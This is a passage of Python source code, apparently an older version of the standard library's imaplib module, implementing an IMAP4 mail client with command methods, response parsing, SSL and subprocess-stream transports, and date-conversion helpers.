'EXPUNGE': ('SELECTED',),
'FETCH': ('SELECTED',),
'GETACL': ('AUTH', 'SELECTED'),
'GETANNOTATION':('AUTH', 'SELECTED'),
'GETQUOTA': ('AUTH', 'SELECTED'),
'GETQUOTAROOT': ('AUTH', 'SELECTED'),
'MYRIGHTS': ('AUTH', 'SELECTED'),
'LIST': ('AUTH', 'SELECTED'),
'LOGIN': ('NONAUTH',),
'LOGOUT': ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT'),
'LSUB': ('AUTH', 'SELECTED'),
'NAMESPACE': ('AUTH', 'SELECTED'),
'NOOP': ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT'),
'PARTIAL': ('SELECTED',), # NB: obsolete
'PROXYAUTH': ('AUTH',),
'RENAME': ('AUTH', 'SELECTED'),
'SEARCH': ('SELECTED',),
'SELECT': ('AUTH', 'SELECTED'),
'SETACL': ('AUTH', 'SELECTED'),
'SETANNOTATION':('AUTH', 'SELECTED'),
'SETQUOTA': ('AUTH', 'SELECTED'),
'SORT': ('SELECTED',),
'STARTTLS': ('NONAUTH',),
'STATUS': ('AUTH', 'SELECTED'),
'STORE': ('SELECTED',),
'SUBSCRIBE': ('AUTH', 'SELECTED'),
'THREAD': ('SELECTED',),
'UID': ('SELECTED',),
'UNSUBSCRIBE': ('AUTH', 'SELECTED'),
}
# Patterns to match server responses
Continuation = re.compile(br'\+( (?P<data>.*))?')
Flags = re.compile(br'.*FLAGS \((?P<flags>[^\)]*)\)')
InternalDate = re.compile(br'.*INTERNALDATE "'
br'(?P<day>[ 0123][0-9])-(?P<mon>[A-Z][a-z][a-z])-(?P<year>[0-9][0-9][0-9][0-9])'
br' (?P<hour>[0-9][0-9]):(?P<min>[0-9][0-9]):(?P<sec>[0-9][0-9])'
br' (?P<zonen>[-+])(?P<zoneh>[0-9][0-9])(?P<zonem>[0-9][0-9])'
br'"')
Literal = re.compile(br'.*{(?P<size>\d+)}$', re.ASCII)
MapCRLF = re.compile(br'\r\n|\r|\n')
Response_code = re.compile(br'\[(?P<type>[A-Z-]+)( (?P<data>[^\]]*))?\]')
Untagged_response = re.compile(br'\* (?P<type>[A-Z-]+)( (?P<data>.*))?')
Untagged_status = re.compile(
br'\* (?P<data>\d+) (?P<type>[A-Z-]+)( (?P<data2>.*))?', re.ASCII)
class IMAP4:
"""IMAP4 client class.
Instantiate with: IMAP4([host[, port]])
host - host's name (default: localhost);
port - port number (default: standard IMAP4 port).
All IMAP4rev1 commands are supported by methods of the same
name (in lower-case).
All arguments to commands are converted to strings, except for
AUTHENTICATE, and the last argument to APPEND which is passed as
an IMAP4 literal. If necessary (the string contains any
non-printing characters or white-space and isn't enclosed with
either parentheses or double quotes) each string is quoted.
However, the 'password' argument to the LOGIN command is always
quoted. If you want to avoid having an argument string quoted
(eg: the 'flags' argument to STORE) then enclose the string in
parentheses (eg: "(\Deleted)").
Each command returns a tuple: (type, [data, ...]) where 'type'
is usually 'OK' or 'NO', and 'data' is either the text from the
tagged response, or untagged results from command. Each 'data'
is either a string, or a tuple. If a tuple, then the first part
is the header of the response, and the second part contains
the data (ie: 'literal' value).
Errors raise the exception class <instance>.error("<reason>").
IMAP4 server errors raise <instance>.abort("<reason>"),
which is a sub-class of 'error'. Mailbox status changes
from READ-WRITE to READ-ONLY raise the exception class
<instance>.readonly("<reason>"), which is a sub-class of 'abort'.
"error" exceptions imply a program error.
"abort" exceptions imply the connection should be reset, and
the command re-tried.
"readonly" exceptions imply the command should be re-tried.
Note: to use this module, you must read the RFCs pertaining to the
IMAP4 protocol, as the semantics of the arguments to each IMAP4
command are left to the invoker, not to mention the results. Also,
most IMAP servers implement a sub-set of the commands available here.
"""
class error(Exception): pass # Logical errors - debug required
class abort(error): pass # Service errors - close and retry
class readonly(abort): pass # Mailbox status changed to READ-ONLY
def __init__(self, host = '', port = IMAP4_PORT):
self.debug = Debug
self.state = 'LOGOUT'
self.literal = None # A literal argument to a command
self.tagged_commands = {} # Tagged commands awaiting response
self.untagged_responses = {} # {typ: [data, ...], ...}
self.continuation_response = '' # Last continuation response
self.is_readonly = False # READ-ONLY desired state
self.tagnum = 0
self._tls_established = False
# Open socket to server.
self.open(host, port)
try:
self._connect()
except Exception:
try:
self.shutdown()
except socket.error:
pass
raise
def _connect(self):
# Create unique tag for this session,
# and compile tagged response matcher.
self.tagpre = Int2AP(random.randint(4096, 65535))
self.tagre = re.compile(br'(?P<tag>'
+ self.tagpre
+ br'\d+) (?P<type>[A-Z]+) (?P<data>.*)', re.ASCII)
# Get server welcome message,
# request and store CAPABILITY response.
if __debug__:
self._cmd_log_len = 10
self._cmd_log_idx = 0
self._cmd_log = {} # Last `_cmd_log_len' interactions
if self.debug >= 1:
self._mesg('imaplib version %s' % __version__)
self._mesg('new IMAP4 connection, tag=%s' % self.tagpre)
self.welcome = self._get_response()
if 'PREAUTH' in self.untagged_responses:
self.state = 'AUTH'
elif 'OK' in self.untagged_responses:
self.state = 'NONAUTH'
else:
raise self.error(self.welcome)
self._get_capabilities()
if __debug__:
if self.debug >= 3:
self._mesg('CAPABILITIES: %r' % (self.capabilities,))
for version in AllowedVersions:
if not version in self.capabilities:
continue
self.PROTOCOL_VERSION = version
return
raise self.error('server not IMAP4 compliant')
def __getattr__(self, attr):
# Allow UPPERCASE variants of IMAP4 command methods.
if attr in Commands:
return getattr(self, attr.lower())
raise AttributeError("Unknown IMAP4 command: '%s'" % attr)
# Overridable methods
def _create_socket(self):
return socket.create_connection((self.host, self.port))
def open(self, host = '', port = IMAP4_PORT):
"""Setup connection to remote server on "host:port"
(default: localhost:standard IMAP4 port).
This connection will be used by the routines:
read, readline, send, shutdown.
"""
self.host = host
self.port = port
self.sock = self._create_socket()
self.file = self.sock.makefile('rb')
def read(self, size):
"""Read 'size' bytes from remote."""
chunks = []
read = 0
while read < size:
data = self.file.read(min(size-read, 4096))
if not data:
break
read += len(data)
chunks.append(data)
return b''.join(chunks)
def readline(self):
"""Read line from remote."""
return self.file.readline()
def send(self, data):
"""Send data to remote."""
self.sock.sendall(data)
def shutdown(self):
"""Close I/O established in "open"."""
self.file.close()
try:
self.sock.shutdown(socket.SHUT_RDWR)
except socket.error as e:
# The server might already have closed the connection
if e.errno != errno.ENOTCONN:
raise
finally:
self.sock.close()
def socket(self):
"""Return socket instance used to connect to IMAP4 server.
socket = <instance>.socket()
"""
return self.sock
# Utility methods
def recent(self):
"""Return most recent 'RECENT' responses if any exist,
else prompt server for an update using the 'NOOP' command.
(typ, [data]) = <instance>.recent()
'data' is None if no new messages,
else list of RECENT responses, most recent last.
"""
name = 'RECENT'
typ, dat = self._untagged_response('OK', [None], name)
if dat[-1]:
return typ, dat
typ, dat = self.noop() # Prod server for response
return self._untagged_response(typ, dat, name)
def response(self, code):
"""Return data for response 'code' if received, or None.
Old value for response 'code' is cleared.
(code, [data]) = <instance>.response(code)
"""
return self._untagged_response(code, [None], code.upper())
# IMAP4 commands
def append(self, mailbox, flags, date_time, message):
"""Append message to named mailbox.
(typ, [data]) = <instance>.append(mailbox, flags, date_time, message)
All args except `message' can be None.
"""
name = 'APPEND'
if not mailbox:
mailbox = 'INBOX'
if flags:
if (flags[0],flags[-1]) != ('(',')'):
flags = '(%s)' % flags
else:
flags = None
if date_time:
date_time = Time2Internaldate(date_time)
else:
date_time = None
self.literal = MapCRLF.sub(CRLF, message)
return self._simple_command(name, mailbox, flags, date_time)
def authenticate(self, mechanism, authobject):
"""Authenticate command - requires response processing.
'mechanism' specifies which authentication mechanism is to
be used - it must appear in <instance>.capabilities in the
form AUTH=<mechanism>.
'authobject' must be a callable object:
data = authobject(response)
It will be called to process server continuation responses.
It should return data that will be encoded and sent to server.
It should return None if the client abort response '*' should
be sent instead.
"""
mech = mechanism.upper()
# XXX: shouldn't this code be removed, not commented out?
#cap = 'AUTH=%s' % mech
#if not cap in self.capabilities: # Let the server decide!
# raise self.error("Server doesn't allow %s authentication." % mech)
self.literal = _Authenticator(authobject).process
typ, dat = self._simple_command('AUTHENTICATE', mech)
if typ != 'OK':
raise self.error(dat[-1])
self.state = 'AUTH'
return typ, dat
def capability(self):
"""(typ, [data]) = <instance>.capability()
Fetch capabilities list from server."""
name = 'CAPABILITY'
typ, dat = self._simple_command(name)
return self._untagged_response(typ, dat, name)
def check(self):
"""Checkpoint mailbox on server.
(typ, [data]) = <instance>.check()
"""
return self._simple_command('CHECK')
def close(self):
"""Close currently selected mailbox.
Deleted messages are removed from writable mailbox.
This is the recommended command before 'LOGOUT'.
(typ, [data]) = <instance>.close()
"""
try:
typ, dat = self._simple_command('CLOSE')
finally:
self.state = 'AUTH'
return typ, dat
def copy(self, message_set, new_mailbox):
"""Copy 'message_set' messages onto end of 'new_mailbox'.
(typ, [data]) = <instance>.copy(message_set, new_mailbox)
"""
return self._simple_command('COPY', message_set, new_mailbox)
def create(self, mailbox):
"""Create new mailbox.
(typ, [data]) = <instance>.create(mailbox)
"""
return self._simple_command('CREATE', mailbox)
def delete(self, mailbox):
"""Delete old mailbox.
(typ, [data]) = <instance>.delete(mailbox)
"""
return self._simple_command('DELETE', mailbox)
def deleteacl(self, mailbox, who):
"""Delete the ACLs (remove any rights) set for who on mailbox.
(typ, [data]) = <instance>.deleteacl(mailbox, who)
"""
return self._simple_command('DELETEACL', mailbox, who)
def expunge(self):
"""Permanently remove deleted items from selected mailbox.
Generates 'EXPUNGE' response for each deleted message.
(typ, [data]) = <instance>.expunge()
'data' is list of 'EXPUNGE'd message numbers in order received.
"""
name = 'EXPUNGE'
typ, dat = self._simple_command(name)
return self._untagged_response(typ, dat, name)
def fetch(self, message_set, message_parts):
"""Fetch (parts of) messages.
(typ, [data, ...]) = <instance>.fetch(message_set, message_parts)
'message_parts' should be a string of selected parts
enclosed in parentheses, eg: "(UID BODY[TEXT])".
'data' are tuples of message part envelope and data.
"""
name = 'FETCH'
typ, dat = self._simple_command(name, message_set, message_parts)
return self._untagged_response(typ, dat, name)
def getacl(self, mailbox):
"""Get the ACLs for a mailbox.
(typ, [data]) = <instance>.getacl(mailbox)
"""
typ, dat = self._simple_command('GETACL', mailbox)
return self._untagged_response(typ, dat, 'ACL')
def getannotation(self, mailbox, entry, attribute):
"""(typ, [data]) = <instance>.getannotation(mailbox, entry, attribute)
Retrieve ANNOTATIONs."""
typ, dat = self._simple_command('GETANNOTATION', mailbox, entry, attribute)
return self._untagged_response(typ, dat, 'ANNOTATION')
def getquota(self, root):
"""Get the quota root's resource usage and limits.
Part of the IMAP4 QUOTA extension defined in rfc2087.
(typ, [data]) = <instance>.getquota(root)
"""
typ, dat = self._simple_command('GETQUOTA', root)
return self._untagged_response(typ, dat, 'QUOTA')
def getquotaroot(self, mailbox):
"""Get the list of quota roots for the named mailbox.
(typ, [[QUOTAROOT responses...], [QUOTA responses]]) = <instance>.getquotaroot(mailbox)
"""
typ, dat = self._simple_command('GETQUOTAROOT', mailbox)
typ, quota = self._untagged_response(typ, dat, 'QUOTA')
typ, quotaroot = self._untagged_response(typ, dat, 'QUOTAROOT')
return typ, [quotaroot, quota]
def list(self, directory='""', pattern='*'):
"""List mailbox names in directory matching pattern.
(typ, [data]) = <instance>.list(directory='""', pattern='*')
'data' is list of LIST responses.
"""
name = 'LIST'
typ, dat = self._simple_command(name, directory, pattern)
return self._untagged_response(typ, dat, name)
def login(self, user, password):
"""Identify client using plaintext password.
(typ, [data]) = <instance>.login(user, password)
NB: 'password' will be quoted.
"""
typ, dat = self._simple_command('LOGIN', user, self._quote(password))
if typ != 'OK':
raise self.error(dat[-1])
self.state = 'AUTH'
return typ, dat
def login_cram_md5(self, user, password):
""" Force use of CRAM-MD5 authentication.
(typ, [data]) = <instance>.login_cram_md5(user, password)
"""
self.user, self.password = user, password
return self.authenticate('CRAM-MD5', self._CRAM_MD5_AUTH)
def _CRAM_MD5_AUTH(self, challenge):
""" Authobject to use with CRAM-MD5 authentication. """
import hmac
return self.user + " " + hmac.HMAC(self.password, challenge).hexdigest()
def logout(self):
"""Shutdown connection to server.
(typ, [data]) = <instance>.logout()
Returns server 'BYE' response.
"""
self.state = 'LOGOUT'
try: typ, dat = self._simple_command('LOGOUT')
except: typ, dat = 'NO', ['%s: %s' % sys.exc_info()[:2]]
self.shutdown()
if 'BYE' in self.untagged_responses:
return 'BYE', self.untagged_responses['BYE']
return typ, dat
def lsub(self, directory='""', pattern='*'):
"""List 'subscribed' mailbox names in directory matching pattern.
(typ, [data, ...]) = <instance>.lsub(directory='""', pattern='*')
'data' are tuples of message part envelope and data.
"""
name = 'LSUB'
typ, dat = self._simple_command(name, directory, pattern)
return self._untagged_response(typ, dat, name)
def myrights(self, mailbox):
"""Show my ACLs for a mailbox (i.e. the rights that I have on mailbox).
(typ, [data]) = <instance>.myrights(mailbox)
"""
typ,dat = self._simple_command('MYRIGHTS', mailbox)
return self._untagged_response(typ, dat, 'MYRIGHTS')
def namespace(self):
""" Returns IMAP namespaces ala rfc2342
(typ, [data, ...]) = <instance>.namespace()
"""
name = 'NAMESPACE'
typ, dat = self._simple_command(name)
return self._untagged_response(typ, dat, name)
def noop(self):
"""Send NOOP command.
(typ, [data]) = <instance>.noop()
"""
if __debug__:
if self.debug >= 3:
self._dump_ur(self.untagged_responses)
return self._simple_command('NOOP')
def partial(self, message_num, message_part, start, length):
"""Fetch truncated part of a message.
(typ, [data, ...]) = <instance>.partial(message_num, message_part, start, length)
'data' is tuple of message part envelope and data.
"""
name = 'PARTIAL'
typ, dat = self._simple_command(name, message_num, message_part, start, length)
return self._untagged_response(typ, dat, 'FETCH')
def proxyauth(self, user):
"""Assume authentication as "user".
Allows an authorised administrator to proxy into any user's
mailbox.
(typ, [data]) = <instance>.proxyauth(user)
"""
name = 'PROXYAUTH'
return self._simple_command('PROXYAUTH', user)
def rename(self, oldmailbox, newmailbox):
"""Rename old mailbox name to new.
(typ, [data]) = <instance>.rename(oldmailbox, newmailbox)
"""
return self._simple_command('RENAME', oldmailbox, newmailbox)
def search(self, charset, *criteria):
"""Search mailbox for matching messages.
(typ, [data]) = <instance>.search(charset, criterion, ...)
'data' is space separated list of matching message numbers.
"""
name = 'SEARCH'
if charset:
typ, dat = self._simple_command(name, 'CHARSET', charset, *criteria)
else:
typ, dat = self._simple_command(name, *criteria)
return self._untagged_response(typ, dat, name)
def select(self, mailbox='INBOX', readonly=False):
"""Select a mailbox.
Flush all untagged responses.
(typ, [data]) = <instance>.select(mailbox='INBOX', readonly=False)
'data' is count of messages in mailbox ('EXISTS' response).
Mandated responses are ('FLAGS', 'EXISTS', 'RECENT', 'UIDVALIDITY'), so
other responses should be obtained via <instance>.response('FLAGS') etc.
"""
self.untagged_responses = {} # Flush old responses.
self.is_readonly = readonly
if readonly:
name = 'EXAMINE'
else:
name = 'SELECT'
typ, dat = self._simple_command(name, mailbox)
if typ != 'OK':
self.state = 'AUTH' # Might have been 'SELECTED'
return typ, dat
self.state = 'SELECTED'
if 'READ-ONLY' in self.untagged_responses \
and not readonly:
if __debug__:
if self.debug >= 1:
self._dump_ur(self.untagged_responses)
raise self.readonly('%s is not writable' % mailbox)
return typ, self.untagged_responses.get('EXISTS', [None])
def setacl(self, mailbox, who, what):
"""Set a mailbox acl.
(typ, [data]) = <instance>.setacl(mailbox, who, what)
"""
return self._simple_command('SETACL', mailbox, who, what)
def setannotation(self, *args):
"""(typ, [data]) = <instance>.setannotation(mailbox[, entry, attribute]+)
Set ANNOTATIONs."""
typ, dat = self._simple_command('SETANNOTATION', *args)
return self._untagged_response(typ, dat, 'ANNOTATION')
def setquota(self, root, limits):
"""Set the quota root's resource limits.
(typ, [data]) = <instance>.setquota(root, limits)
"""
typ, dat = self._simple_command('SETQUOTA', root, limits)
return self._untagged_response(typ, dat, 'QUOTA')
def sort(self, sort_criteria, charset, *search_criteria):
"""IMAP4rev1 extension SORT command.
(typ, [data]) = <instance>.sort(sort_criteria, charset, search_criteria, ...)
"""
name = 'SORT'
#if not name in self.capabilities: # Let the server decide!
# raise self.error('unimplemented extension command: %s' % name)
if (sort_criteria[0],sort_criteria[-1]) != ('(',')'):
sort_criteria = '(%s)' % sort_criteria
typ, dat = self._simple_command(name, sort_criteria, charset, *search_criteria)
return self._untagged_response(typ, dat, name)
def starttls(self, ssl_context=None):
name = 'STARTTLS'
if not HAVE_SSL:
raise self.error('SSL support missing')
if self._tls_established:
raise self.abort('TLS session already established')
if name not in self.capabilities:
raise self.abort('TLS not supported by server')
# Generate a default SSL context if none was passed.
if ssl_context is None:
ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
# SSLv2 considered harmful.
ssl_context.options |= ssl.OP_NO_SSLv2
typ, dat = self._simple_command(name)
if typ == 'OK':
self.sock = ssl_context.wrap_socket(self.sock)
self.file = self.sock.makefile('rb')
self._tls_established = True
self._get_capabilities()
else:
raise self.error("Couldn't establish TLS session")
return self._untagged_response(typ, dat, name)
def status(self, mailbox, names):
"""Request named status conditions for mailbox.
(typ, [data]) = <instance>.status(mailbox, names)
"""
name = 'STATUS'
#if self.PROTOCOL_VERSION == 'IMAP4': # Let the server decide!
# raise self.error('%s unimplemented in IMAP4 (obtain IMAP4rev1 server, or re-code)' % name)
typ, dat = self._simple_command(name, mailbox, names)
return self._untagged_response(typ, dat, name)
def store(self, message_set, command, flags):
"""Alters flag dispositions for messages in mailbox.
(typ, [data]) = <instance>.store(message_set, command, flags)
"""
if (flags[0],flags[-1]) != ('(',')'):
flags = '(%s)' % flags # Avoid quoting the flags
typ, dat = self._simple_command('STORE', message_set, command, flags)
return self._untagged_response(typ, dat, 'FETCH')
def subscribe(self, mailbox):
"""Subscribe to new mailbox.
(typ, [data]) = <instance>.subscribe(mailbox)
"""
return self._simple_command('SUBSCRIBE', mailbox)
def thread(self, threading_algorithm, charset, *search_criteria):
"""IMAPrev1 extension THREAD command.
(type, [data]) = <instance>.thread(threading_algorithm, charset, search_criteria, ...)
"""
name = 'THREAD'
typ, dat = self._simple_command(name, threading_algorithm, charset, *search_criteria)
return self._untagged_response(typ, dat, name)
def uid(self, command, *args):
"""Execute "command arg ..." with messages identified by UID,
rather than message number.
(typ, [data]) = <instance>.uid(command, arg1, arg2, ...)
Returns response appropriate to 'command'.
"""
command = command.upper()
if not command in Commands:
raise self.error("Unknown IMAP4 UID command: %s" % command)
if self.state not in Commands[command]:
raise self.error("command %s illegal in state %s, "
"only allowed in states %s" %
(command, self.state,
', '.join(Commands[command])))
name = 'UID'
typ, dat = self._simple_command(name, command, *args)
if command in ('SEARCH', 'SORT', 'THREAD'):
name = command
else:
name = 'FETCH'
return self._untagged_response(typ, dat, name)
def unsubscribe(self, mailbox):
"""Unsubscribe from old mailbox.
(typ, [data]) = <instance>.unsubscribe(mailbox)
"""
return self._simple_command('UNSUBSCRIBE', mailbox)
def xatom(self, name, *args):
"""Allow simple extension commands
notified by server in CAPABILITY response.
Assumes command is legal in current state.
(typ, [data]) = <instance>.xatom(name, arg, ...)
Returns response appropriate to extension command `name'.
"""
name = name.upper()
#if not name in self.capabilities: # Let the server decide!
# raise self.error('unknown extension command: %s' % name)
if not name in Commands:
Commands[name] = (self.state,)
return self._simple_command(name, *args)
# Private methods
def _append_untagged(self, typ, dat):
if dat is None:
dat = b''
ur = self.untagged_responses
if __debug__:
if self.debug >= 5:
self._mesg('untagged_responses[%s] %s += ["%r"]' %
(typ, len(ur.get(typ,'')), dat))
if typ in ur:
ur[typ].append(dat)
else:
ur[typ] = [dat]
def _check_bye(self):
bye = self.untagged_responses.get('BYE')
if bye:
raise self.abort(bye[-1].decode('ascii', 'replace'))
def _command(self, name, *args):
if self.state not in Commands[name]:
self.literal = None
raise self.error("command %s illegal in state %s, "
"only allowed in states %s" %
(name, self.state,
', '.join(Commands[name])))
for typ in ('OK', 'NO', 'BAD'):
if typ in self.untagged_responses:
del self.untagged_responses[typ]
if 'READ-ONLY' in self.untagged_responses \
and not self.is_readonly:
raise self.readonly('mailbox status changed to READ-ONLY')
tag = self._new_tag()
name = bytes(name, 'ASCII')
data = tag + b' ' + name
for arg in args:
if arg is None: continue
if isinstance(arg, str):
arg = bytes(arg, "ASCII")
data = data + b' ' + arg
literal = self.literal
if literal is not None:
self.literal = None
if type(literal) is type(self._command):
literator = literal
else:
literator = None
data = data + bytes(' {%s}' % len(literal), 'ASCII')
if __debug__:
if self.debug >= 4:
self._mesg('> %r' % data)
else:
self._log('> %r' % data)
try:
self.send(data + CRLF)
except (socket.error, OSError) as val:
raise self.abort('socket error: %s' % val)
if literal is None:
return tag
while 1:
# Wait for continuation response
while self._get_response():
if self.tagged_commands[tag]: # BAD/NO?
return tag
# Send literal
if literator:
literal = literator(self.continuation_response)
if __debug__:
if self.debug >= 4:
self._mesg('write literal size %s' % len(literal))
try:
self.send(literal)
self.send(CRLF)
except (socket.error, OSError) as val:
raise self.abort('socket error: %s' % val)
if not literator:
break
return tag
def _command_complete(self, name, tag):
# BYE is expected after LOGOUT
if name != 'LOGOUT':
self._check_bye()
try:
typ, data = self._get_tagged_response(tag)
except self.abort as val:
raise self.abort('command: %s => %s' % (name, val))
except self.error as val:
raise self.error('command: %s => %s' % (name, val))
if name != 'LOGOUT':
self._check_bye()
if typ == 'BAD':
raise self.error('%s command error: %s %s' % (name, typ, data))
return typ, data
def _get_capabilities(self):
typ, dat = self.capability()
if dat == [None]:
raise self.error('no CAPABILITY response from server')
dat = str(dat[-1], "ASCII")
dat = dat.upper()
self.capabilities = tuple(dat.split())
def _get_response(self):
# Read response and store.
#
# Returns None for continuation responses,
# otherwise first response line received.
resp = self._get_line()
# Command completion response?
if self._match(self.tagre, resp):
tag = self.mo.group('tag')
if not tag in self.tagged_commands:
raise self.abort('unexpected tagged response: %s' % resp)
typ = self.mo.group('type')
typ = str(typ, 'ASCII')
dat = self.mo.group('data')
self.tagged_commands[tag] = (typ, [dat])
else:
dat2 = None
# '*' (untagged) responses?
if not self._match(Untagged_response, resp):
if self._match(Untagged_status, resp):
dat2 = self.mo.group('data2')
if self.mo is None:
# Only other possibility is '+' (continuation) response...
if self._match(Continuation, resp):
self.continuation_response = self.mo.group('data')
return None # NB: indicates continuation
raise self.abort("unexpected response: '%s'" % resp)
typ = self.mo.group('type')
typ = str(typ, 'ascii')
dat = self.mo.group('data')
if dat is None: dat = b'' # Null untagged response
if dat2: dat = dat + b' ' + dat2
# Is there a literal to come?
while self._match(Literal, dat):
# Read literal direct from connection.
size = int(self.mo.group('size'))
if __debug__:
if self.debug >= 4:
self._mesg('read literal size %s' % size)
data = self.read(size)
# Store response with literal as tuple
self._append_untagged(typ, (dat, data))
# Read trailer - possibly containing another literal
dat = self._get_line()
self._append_untagged(typ, dat)
# Bracketed response information?
if typ in ('OK', 'NO', 'BAD') and self._match(Response_code, dat):
typ = self.mo.group('type')
typ = str(typ, "ASCII")
self._append_untagged(typ, self.mo.group('data'))
if __debug__:
if self.debug >= 1 and typ in ('NO', 'BAD', 'BYE'):
self._mesg('%s response: %r' % (typ, dat))
return resp
def _get_tagged_response(self, tag):
while 1:
result = self.tagged_commands[tag]
if result is not None:
del self.tagged_commands[tag]
return result
# Some have reported "unexpected response" exceptions.
# Note that ignoring them here causes loops.
# Instead, send me details of the unexpected response and
# I'll update the code in `_get_response()'.
try:
self._get_response()
except self.abort as val:
if __debug__:
if self.debug >= 1:
self.print_log()
raise
def _get_line(self):
line = self.readline()
if not line:
raise self.abort('socket error: EOF')
# Protocol mandates all lines terminated by CRLF
if not line.endswith(b'\r\n'):
raise self.abort('socket error: unterminated line')
line = line[:-2]
if __debug__:
if self.debug >= 4:
self._mesg('< %r' % line)
else:
self._log('< %r' % line)
return line
def _match(self, cre, s):
# Run compiled regular expression match method on 's'.
# Save result, return success.
self.mo = cre.match(s)
if __debug__:
if self.mo is not None and self.debug >= 5:
self._mesg("\tmatched r'%r' => %r" % (cre.pattern, self.mo.groups()))
return self.mo is not None
def _new_tag(self):
tag = self.tagpre + bytes(str(self.tagnum), 'ASCII')
self.tagnum = self.tagnum + 1
self.tagged_commands[tag] = None
return tag
def _quote(self, arg):
arg = arg.replace('\\', '\\\\')
arg = arg.replace('"', '\\"')
return '"' + arg + '"'
def _simple_command(self, name, *args):
return self._command_complete(name, self._command(name, *args))
def _untagged_response(self, typ, dat, name):
if typ == 'NO':
return typ, dat
if not name in self.untagged_responses:
return typ, [None]
data = self.untagged_responses.pop(name)
if __debug__:
if self.debug >= 5:
self._mesg('untagged_responses[%s] => %s' % (name, data))
return typ, data
if __debug__:
def _mesg(self, s, secs=None):
if secs is None:
secs = time.time()
tm = time.strftime('%M:%S', time.localtime(secs))
sys.stderr.write(' %s.%02d %s\n' % (tm, (secs*100)%100, s))
sys.stderr.flush()
def _dump_ur(self, dict):
# Dump untagged responses (in `dict').
l = dict.items()
if not l: return
t = '\n\t\t'
l = map(lambda x:'%s: "%s"' % (x[0], x[1][0] and '" "'.join(x[1]) or ''), l)
self._mesg('untagged responses dump:%s%s' % (t, t.join(l)))
def _log(self, line):
# Keep log of last `_cmd_log_len' interactions for debugging.
self._cmd_log[self._cmd_log_idx] = (line, time.time())
self._cmd_log_idx += 1
if self._cmd_log_idx >= self._cmd_log_len:
self._cmd_log_idx = 0
def print_log(self):
self._mesg('last %d IMAP4 interactions:' % len(self._cmd_log))
i, n = self._cmd_log_idx, self._cmd_log_len
while n:
try:
self._mesg(*self._cmd_log[i])
except:
pass
i += 1
if i >= self._cmd_log_len:
i = 0
n -= 1
if HAVE_SSL:
class IMAP4_SSL(IMAP4):
"""IMAP4 client class over SSL connection
Instantiate with: IMAP4_SSL([host[, port[, keyfile[, certfile]]]])
host - host's name (default: localhost);
port - port number (default: standard IMAP4 SSL port).
keyfile - PEM formatted file that contains your private key (default: None);
certfile - PEM formatted certificate chain file (default: None);
for more documentation see the docstring of the parent class IMAP4.
"""
def __init__(self, host = '', port = IMAP4_SSL_PORT, keyfile = None, certfile = None):
self.keyfile = keyfile
self.certfile = certfile
IMAP4.__init__(self, host, port)
def _create_socket(self):
sock = IMAP4._create_socket(self)
return ssl.wrap_socket(sock, self.keyfile, self.certfile)
def open(self, host='', port=IMAP4_SSL_PORT):
"""Setup connection to remote server on "host:port".
(default: localhost:standard IMAP4 SSL port).
This connection will be used by the routines:
read, readline, send, shutdown.
"""
IMAP4.open(self, host, port)
__all__.append("IMAP4_SSL")
class IMAP4_stream(IMAP4):
"""IMAP4 client class over a stream
Instantiate with: IMAP4_stream(command)
where "command" is a string that can be passed to subprocess.Popen()
for more documentation see the docstring of the parent class IMAP4.
"""
def __init__(self, command):
self.command = command
IMAP4.__init__(self)
def open(self, host = None, port = None):
"""Setup a stream connection.
This connection will be used by the routines:
read, readline, send, shutdown.
"""
self.host = None # For compatibility with parent class
self.port = None
self.sock = None
self.file = None
self.process = subprocess.Popen(self.command,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
shell=True, close_fds=True)
self.writefile = self.process.stdin
self.readfile = self.process.stdout
def read(self, size):
"""Read 'size' bytes from remote."""
return self.readfile.read(size)
def readline(self):
"""Read line from remote."""
return self.readfile.readline()
def send(self, data):
"""Send data to remote."""
self.writefile.write(data)
self.writefile.flush()
def shutdown(self):
"""Close I/O established in "open"."""
self.readfile.close()
self.writefile.close()
self.process.wait()
class _Authenticator:
"""Private class to provide en/decoding
for base64-based authentication conversation.
"""
def __init__(self, mechinst):
self.mech = mechinst # Callable object to provide/process data
def process(self, data):
ret = self.mech(self.decode(data))
if ret is None:
return '*' # Abort conversation
return self.encode(ret)
def encode(self, inp):
#
# Invoke binascii.b2a_base64 iteratively with
# short even length buffers, strip the trailing
# line feed from the result and append. "Even"
# means a number that factors to both 6 and 8,
# so when it gets to the end of the 8-bit input
# there's no partial 6-bit output.
#
oup = ''
while inp:
if len(inp) > 48:
t = inp[:48]
inp = inp[48:]
else:
t = inp
inp = ''
e = binascii.b2a_base64(t)
if e:
oup = oup + e[:-1]
return oup
def decode(self, inp):
if not inp:
return ''
return binascii.a2b_base64(inp)
Mon2num = {b'Jan': 1, b'Feb': 2, b'Mar': 3, b'Apr': 4, b'May': 5, b'Jun': 6,
b'Jul': 7, b'Aug': 8, b'Sep': 9, b'Oct': 10, b'Nov': 11, b'Dec': 12}
def Internaldate2tuple(resp):
"""Parse an IMAP4 INTERNALDATE string.
Return corresponding local time. The return value is a
time.struct_time tuple or None if the string has wrong format.
"""
mo = InternalDate.match(resp)
if not mo:
return None
mon = Mon2num[mo.group('mon')]
zonen = mo.group('zonen')
day = int(mo.group('day'))
year = int(mo.group('year'))
hour = int(mo.group('hour'))
min = int(mo.group('min'))
sec = int(mo.group('sec'))
zoneh = int(mo.group('zoneh'))
zonem = int(mo.group('zonem'))
# INTERNALDATE timezone must be subtracted to get UT
zone = (zoneh*60 + zonem)*60
if zonen == b'-':
zone = -zone
tt = (year, mon, day, hour, min, sec, -1, -1, -1)
utc = time.mktime(tt)
# Following is necessary because the time module has no 'mkgmtime'.
# 'mktime' assumes arg in local timezone, so adds timezone/altzone.
lt = time.localtime(utc)
if time.daylight and lt[-1]:
zone = zone + time.altzone
else:
zone = zone + time.timezone
return time.localtime(utc - zone)
def Int2AP(num):
"""Convert integer to A-P string representation."""
val = b''; AP = b'ABCDEFGHIJKLMNOP'
num = int(abs(num))
while num:
num, mod = divmod(num, 16)
val = AP[mod:mod+1] + val
return val
def ParseFlags(resp):
"""Convert IMAP4 flags response to python tuple."""
mo = Flags.match(resp)
if not mo:
return ()
return tuple(mo.group('flags').split())
def Time2Internaldate(date_time):
"""Convert date_time to IMAP4 INTERNALDATE representation.
Return string in form: '"DD-Mmm-YYYY HH:MM:SS +HHMM"'. The
date_time argument can be a number (int or float) represening
seconds since epoch (as returned by time.time()), a 9-tuple
